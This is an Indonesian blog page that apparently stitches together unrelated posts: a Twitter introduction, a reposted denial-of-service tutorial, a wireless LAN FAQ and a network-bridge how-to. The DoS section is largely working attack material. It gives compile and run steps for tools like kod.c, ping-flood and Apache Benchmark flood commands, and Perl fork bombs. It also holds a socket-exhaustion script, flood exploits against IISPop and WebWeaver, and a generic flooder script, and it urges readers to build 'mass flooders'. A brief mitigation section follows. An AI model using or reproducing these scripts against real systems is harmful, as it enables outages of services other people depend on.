Showing posts sorted by relevance for query apa-dan-bagaimana-cara-menggunakan. Sort by date Show all posts
Setelah kita tau apa itu twitter, kini bagaimana cara memakai twitter? Sederhana sekali, kalo kita ingin mendapat info tercepat melalui rekan, atau siapa pun juga yang memiliki informasi, dengan twitter kita cukup mengikuti seseorang yang punya info dan info dengan sekejap selalu mengalir ke deck twitter kita.
Apa manfaatnya kita mengikuti orang??? di sini lah hebatnya twitter!! Google, Yahoo, Youtube, Nokia, Apple dan yang lainnya semua ikut twitter!! Coba bayangkan kalo kita jadi rekan mereka di twitter, tiap detik info akan mengalir ke deck twitter kita, dan kita akan jadi akseptor info pertama yang eksklusif mendapat info ketika itu juga.
Yah memang untuk Indonesia twitter tidak sepopuler facebook. dan belum banyak yang punya akun, tapi tidak mengecewakan lho... kompas, antara, okezone, juga udah punya twitter.. jadi kita sanggup eksklusif tau info terkini...! Tanpa memenuhi inbox email kita tentunya :)
Apa Dan Bagaimana Cara Memakai Twitter?
2. Apa motif cracker untuk melaksanakan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?
Semuanya untuk anda, ENJOY !!.
.o0 Apa itu Denial of Service (DoS) ?
Denial of Service yakni aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak sanggup memakai layanan tersebut. Dampak selesai dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang sanggup berakibat sangat fatal (dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti aturan ini.
Beberapa aktifitas DoS adalah:
1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk sanggup memakai layanan.
4. Merusak sistem semoga korban tidak sanggup memakai layanan.
.o0 Motif penyerang melaksanakan Denial of Service
Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melaksanakan Denial of Service yaitu:
1. Status Sub-Kultural.
2. Untuk mendapat akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.
Satatus subkultural dalam dunia hacker, yakni sebuah unjuk gigi atau lebih sempurna kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan ekonomi untuk ketika kini juga merupakan alasan yang paling relevan. Kita bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of Service'. Beberapa kasus serangan virus semacam 'code-red' melaksanakan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapat program-program DoS, menyerupai nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS sanggup melaksanakan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat gampang untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc ... .o0 Denial of Sevice, serangan yang menghabiskan resource.
Pada dasarnya, untuk melumpuhkan sebuah layanan diperlukan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:
A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD
A. Swap Space
Hampir semua sistem memakai ratusan MBs spasi swap untuk melayani undangan client. Spasi swap juga dipakai untuk mem-'forked' child process. Bagaimanapun spasi swap selalu berubah dan dipakai dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.
B. Bandwidth
Beberapa serangan Denial of Service menghabiskan bandwidth.
C. Kernel Tables
Serangan pada kernel tables, bisa berakibat sangat jelek pada sistem. Alokasi memori kepada kernel juga merupakan sasaran serangan yang sensitif. Kernel mempunyai kernelmap limit, jikalau sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.
D. RAM
Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.
E. Disk
Serangan klasik banyak dilakukan dengan memenuhi Disk.
F. Caches
G. INETD
Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.
.o0 Teknik Melakukan Denial of Service
Melakukan DoS sesungguhnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak jelek terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya yakni menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.
1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada ketika koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang mengakibatkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang dipakai tetapi lebih spesifik lagi terhadap prosessor yang dipakai yaitu pentium.
3. Ping Flooding
Ping Flooding yakni brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak sanggup mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi lantaran mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing" (http://www.quadrunner.com/ chuegen/smurf.txt).
Serangan memakai exploits.
Beberapa hal yang harus dipahami sebelum melaksanakan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search semoga lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)
1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang sanggup dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini yakni menciptakan hang/blue screen of death pada komputer korban. Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini yakni tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server sasaran (misalnya: blocking)
2. BONK/BOINK
Bong yakni dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang sanggup menciptakan crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.
4. NesTea
Tool ini sanggup membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan yakni Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini yakni Blue Screen of Death
Serangan pribadi (+ 31337)
1. Ping Flood
Membutuhkan saluran root untuk melaksanakan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, dipakai untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melaksanakan penyalahgunaan. bash $ /usr/sbin/ab -n 10000 -c 300 \ http://korban.com/cgi-bin/search.cgi?q= ... cukup+umum (diketik dalam 1 baris!) Akan melaksanakan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache mempunyai kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation yakni MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak sanggup berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.
Penyerang hanya melaksanakan koneksi kemudian diam, pada ketika itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seakan-akan server korban tewas.
Script gs.pl (gantung socket)
#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !
DoS-ing Apache lagi !!
Beberapa teladan skrip perl untuk melaksanakan DoS-ing secara local.
1. Fork Bomb, habiskan RAM
#!/usr/bin/perl
fork while 1;
2. Habiskan CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i
3. Habiskan Memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }
4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) sanggup terjadi secara remote jikalau demon (server) tidak melaksanakan verifikasi input sehingga input membanjiri buffer dan mengakibatkan jadwal tidak boleh secara paksa.
Beberapa 'proof of concept' sanggup dipelajari melalui beberapa teladan ini.
1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS
IISPop akan crash jikalau diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba yakni V: 1.161 dan 1.181
Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;
print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING sesudah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# END.
2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host
wzdftpd crash sesudah diberikan perintah/command PORT !
3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : http://www.brswebweaver.com
BugTraqer : euronymous /F0KP
}------- start of fadvWWhtdos.py ---------------{
#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib
met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your sasaran hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fadvWWhtdos.py ---------------{
Serangan diatas mengirimkan 32700 huruf yang mengakibatkan server crash !
4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org
Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command
SELECT. Dampak dari serangan ini yakni berhentiya server dan harus di-restart secara
manual.
Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------
Perhatian !, teladan eksploitasi diatas memakai NetCat (nc), anda bisa dapatkan tool
ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'
Jika kita perhatikan, serangan flooding mempunyai kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jikalau dilakukan pada komputer esekutor yang mempunyai bandwidth lebar.
Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
Dari step diatas, kita bisa menciptakan sebuah skrip universal untuk melaksanakan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).
-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING sesudah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# End.
-- udos.pl --
Skrip sederhana diatas hanya melaksanakan kekerabatan dengan server korban, kemudian mengirimkan flood dan melaksanakan post testing. Dengan sedikit pemprograman anda sanggup menciptakan sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas anda !
.o0 Penanggulangan serangan Denial of Service
Sejujurnya, pecahan inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melaksanakan input flooding dan menciptakan tool sendiri. Namun Denial of service yakni problem layanan publik.Sama halnya dengan anda mempunyai toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan 'menutup' toko anda - dan ini yakni cara paling efektif - namun tanggapan kekanak-kanakan demikian tentu tidak anda harapkan.
1. Selalu Up 2 Date.
Seperti teladan serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 mempunyai option untuk menolak cracker untuk mengakses system.
2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat gampang untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melaksanakan Denial of Service -. Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara pribadi dengan Flooding sanggup diatasi dengan menginstall patch terbaru dari vendor
atau melaksanakan up-date.
3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark. Hal ini sesungguhnya sangat sulit untuk diatasi. Anda bisa melaksanakan identifikasi terhadap pelaku dan melaksanakan pemblokiran manual melalui firewall atau prosedur kontrol Apache (Order, Allow from, Deny From). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti. Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. Jangan lupa juga menambah RAM.
4. Pencegahan serangan non elektronik.
Serangan yang paling efektif intinya yakni local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user yakni orang 'baik'. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan hukuman untuk mencegah user melaksanakan serangan dari dalam. Mungkin cukup efektif jikalau dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.
di kutip dari http://yogyafree.net/forum2
Semua Wacana Dos (Denial Of Service)
3. Apa Maksud dari Istilah 802.11a/b/g?
Istilah ini merupakan sebuah nomor standardisasi dari sistem WLAN yang ada ketika ini. Dalam standardisasi ini diatur apa dan bagaimana jaringan WLAN bekerja. Mulai dari teknik modulasi sinyalnya, frekuensi range-nya, hingga jenis antena yang cocok digunakan. Masing-masing standar mempunyai spesifikasi teknis yang berbeda-beda. Dengan demikian cara kerja, perangkat pendukung, dan performa yang dihasilkan dari setiap standar tersebut berbeda-beda satu sama lain.
Mungkin sebagian besar pengguna jaringan wireless niscaya sudah pernah mendengar istilah yang terdiri dari angka dan abjad ini. Memang benar ketika Anda ingin memakai jaringan wireless, Anda harus mengetahui lebih dahulu perangkat Anda bekerja di standar yang mana. Karena kalau Anda membeli perangkat yang tidak cocok dengan perangkat AP atau perangkat wireless lainnya, maka Anda mustahil sanggup terkoneksi ke jaringan tersebut. Untuk itu, sangat disarankan Anda meneliti dulu perangkat wireless Anda bekerja pada jenis apa.
Saat ini standar yang paling umum dipakai ialah standar 802.11b dan 802.11g. Namun, ketika ini tidak jarang juga sebuah perangkat wireless sengaja dibentuk dengan mempunyai kemampuan bekerja pada ketiga standar tersebut. Makara satu perangkat dilengkapi dengan tiga spesifikasi yang berbeda. Dengan demikian, Anda tidak akan kesulitan untuk terkoneksi kedalam jaringan wireless dengan standar apapun.
4. Mengapa Standar 802.11b dan g Bekerja Menggunakan Frekuensi 2,4 GHz?
Kedua standar tersebut memang bekerja pada frekuensi range 2,4 GHz. Yang menjadi pertanyaan ialah mengapa harus pada frekuensi tersebut? Frekuensi range ini termasuk dalam kategori pita frekuensi ISM (Industrial, Scientific, and Medical). Pita frekuensi ISM ini memang dialokasikan oleh tubuh standardisasi dan regulasi untuk dipakai sebebasbebasnya tanpa perlu diberi sistem perizinan (unlicenses). Maka dari itu, banyak sekali produk elektronik yang memakai pita frekuensi ini termasuk juga jaringan wireless.
5. Mengapa 802.11a Menggunakan Frekuensi 5 GHz?
Pita frekuensi yang dipakai oleh standar ini tergolong dalam kategori UNII (Unlicensed National Information Infrastructure). Sama ibarat pita frekuensi standar 802.11b/g, frekuensi ini juga tidak memerlukan perizinan untuk menggunakannya. Perbedaan yang paling fundamental dari kedua jenis frekuensi ini hanyalah sudah umum atau belumnya penggunaan frekuensi ini di masyarakat. Saat ini, frekuensi UNII 5 GHz ini masih jarang dipakai sehingga problem-problem ibarat interferensi sangat jarang terjadi di sini.
6. Apakah WI-FI Itu?
WI-FI merupakan istilah yang diberikan untuk sistem wireless LAN yang memakai standar 802.11 yang ada ketika ini. Istilah WI-FI diciptakan oleh sebuah organisasi berjulukan WI-FI alliance yang bekerja menguji dan memperlihatkan sertifikasi untuk perangkat-perangkat WLAN.
Pada awalnya, sertifikasi WI-FI hanya diberikan pada perangkat wireless yang bekerja pada standar 802.11b. Namun, ketika ini standar ini juga diberikan pada semua perangkat yang memakai standar 802.11. Sertifikasi WI-FI sudah dianggap sebagai sertifikasi standar untuk perangkat wireless yang ada ketika ini. WI-FI sudah banyak dipakai di aneka macam sektor ibarat bisnis, akademis, perumahan, dan banyak lagi.
7. Apakah Access Point?
Access point atau yang lebih sering disebut dengan istilah AP merupakan sebuah perangkat penghubung antara jaringan wire dengan wireless. Maksudnya sebuah AP akan bertugas mengubah data yang kemudian lalang di media kabel menjadi sinyal-sinyal radio yang sanggup ditangkap oleh perangkat wireless. AP akan menjadi gerbang bagi jaringan wireless untuk sanggup berkomunikasi dengan dunia luar maupun dengan antarsesama perangkat wireless di dalamnya.
Penggunaan AP yang banyak tentu akan meningkatkan kapasitas pengguna dan juga jarak coverage jaringan wireless Anda. Selain itu, Anda juga sanggup membuat sebuah sistem roaming WLAN. Maksudnya para pengguna sanggup bergerak ke sana-ke mari dengan bebas tanpa terputus koneksinya alasannya ialah sinyal-sinyal komunikasinya sanggup dilayani oleh beberapa AP yang berbeda. Sistem yang sama juga dipakai dalam jaringan telepon selular.
Serba-Serbi Wireless (Bag 2)
Tutorial jaringan ini sanggup berjalan di komputer windows baik itu windows xp, windows vista ataupun windows 7. Berdasarkan riset dan pengalaman saya menciptakan jaringan di Lab Komputer.
Biasanya pada laboratorium komputer terdapat 30 atau lebih komputer yang kalau digabungkan menjadi satu jaringan utuh membutuhkan teknik network bridge yaitu menyatukan dua jaringan menjadi 1 jaringan besar. Contoh perkara : Di Laboratorium Komputer Pesantren Terpadu Darul Alquran Mulia yang saya kelola terdapat 30 Komputer yang kalau ingin digabungkan menjadi 1 jaringan harus menggunakan teknik network bridge. Mengapa?
Bisa dilihat peta lab komputer di samping, terdapat 3 jaringan yang terpisah yang seharusnya disatukan biar sanggup terhubung satu-sama lain. Solusi yang saya pakai ialah menggunakan wireless. Setiap blok jaringan saya beri 1 wireless yang bertugas menghubungkan jaringan yang satu dengan yang lainnya menggunakan ad-hoc. Kaprikornus ada 3 komputer yang dipasangi wireless (1 komputer di blok kiri, 1 komputer di blok tengah dan 1 komputer lagi diblok kanan), nah komputer inilah yang akan dijadikan network bridge.
Bagaimana caranya?
Ternyata sederhana sekali , 3 komputer tersebut di atas niscaya mempunyai dua koneksi ibarat ini :
satu koneksi jaringan kabel lan, dan satunya koneksi jaringan wireless yang dipakai untuk menghubungkan antar jaringan ibarat saya bahas di atas.
Pertanyaan sederhananya, emangnya gak sanggup dibiarkan 2 jaringan ibarat itu? hmm.. jawabnya bisa! Tapi…. ada tapinya kawan, kalau dua koneksi dibiarkan ibarat itu tentu IP Addressnya pun harus berbeda sedangkan yang kita inginkan ialah menciptakan ketiga jaringan tersebut bersatu menjadi 1 jaringan besar. Dan disitulah fungsi network bridge yang berfungsi sebagai jembatan penghubung.
Kalau boleh dikatakan Network Bridge ialah sebuah koneksi virtual yang menjembatani dua jaringan antar lebih sehingga kedua jaringan atau lebih itu sanggup menjadi satu jaringan utuh yang sanggup saling berkomunikasi. Ok pribadi saja kita mulai semudah apa menciptakan network bridge.
Langkah pertama ibarat terlihat gambar di atas, yang perlu kita lakukan ialah memblok dua koneksi jaringan di atas lalu klik kanan dan pilih Bridge Connections. Syarat bridge connection ialah salah satu di antara koneksi yang ingin di bridge dilarang dalam posisi sharing atau dilarang sedang dalam sharing internet.
Setelah proses Bridging tamat maka status network connection akan ibarat gambar di bawah ini
Nah kini network jaringan anda telah terjembatani, dan jangan lupa untuk mensetting IP Address Network Bridge sesuai dengan jaringan IP Address Anda.
Sekian dulu tutorial singkat dari saya, semoga sanggup berkhasiat bagi teman-teman yang membutuhkan. Jika ada saran, kritik, embel-embel ide, atau pun komentar yang bersifat positif silahkan posting di komentar atau hubungi Yahoo Messenger saya (ai_amakusa) pun di Facebook (Ahmad Alimuddin) sanggup juga di twitter (twitter.com/eksplore). Terimakasih telah mengunjungi blog sederhana saya.